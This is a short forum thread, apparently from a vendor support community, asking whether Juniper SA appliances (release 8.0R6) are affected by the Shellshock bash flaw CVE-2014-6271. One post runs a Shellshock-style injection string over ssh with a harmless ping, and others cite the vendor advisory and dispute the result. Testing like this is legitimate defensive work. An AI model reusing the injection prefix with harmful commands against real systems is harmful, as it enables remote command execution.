Can anyone tell me if any SA software is available to CVE-2014-6271? Pretty sure its core is not GNU Bash but just want to make sure.
Thanks!
Came here to ask the exact same question.
Ups...
release 8.0R6
$ /usr/bin/ssh -o "rsaauthentication yes" XX.XXX.XXX.XXX '() { ignored; }; ping -c 3 127.0.0.1'
Password:
PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=0 ttl=64 time=0.032 ms
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.025 ms
64 bytes from 127.0.0.1: icmp_seq=2 ttl=64 time=0.029 ms
--- 127.0.0.1 ping statistics ---
3 packets transmitted, 3 received, 0% packet loss, time 1999ms
rtt min/avg/max/mdev = 0.025/0.028/0.032/0.006 ms, pipe 2
<hello xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<capabilities>
<capability>urn:ietf:params:netconf:base:1.0</capability>
<capability>urn:ietf:params:netconf:base:2.0</capability>
<capability>http://xml.juniper.net/dmi/software/1.0</capability>
<capability>http://xml.juniper.net/dmi/software/2.0</capability>
<capability>http://xml.juniper.net/dmi/system/1.0</capability>
<capability>http://xml.juniper.net/dmi/ive-sa/8.0R6</capability>
<capability>urn:ietf:params:xml:ns:netconf:base:1.0</capability>
<capability>urn:ietf:params:netconf:capability:writable-running:1.0</capability>
</capabilities>
<session-id>28301</session-id>
</hello>
]]>]]>
^CKilled by signal 2.
flip_pipe
And what does this mean?
Here is Juniper's official statement about the bash vulnerability:
http://kb.pulsesecure.net/InfoCenter/index?page=content&id=JSA10648&smlogin=true
Thanks Kita!
@kita wrote:
Here is Juniper's official statement about the bash vulnerability:
http://kb.pulsesecure.net/InfoCenter/index?page=content&id=JSA10648&smlogin=true
I want to know that too, and according to Juniper's official statement, SA/MAG devices are not vulnerable. Besides, I don't understand why the SA device would return an XML stream after ping is executed.
SSH is not available on the SA. This is not a bash terminal.
Then how did the SA respond with the non-netconf command "ping -c 3 127.0.0.1"? Shouldn't the SA refuse anything else if the netconf subsystem is not specified by the client? I also don't understand why he specified the ssh option "rsaauthentication yes" yet he had to enter a password.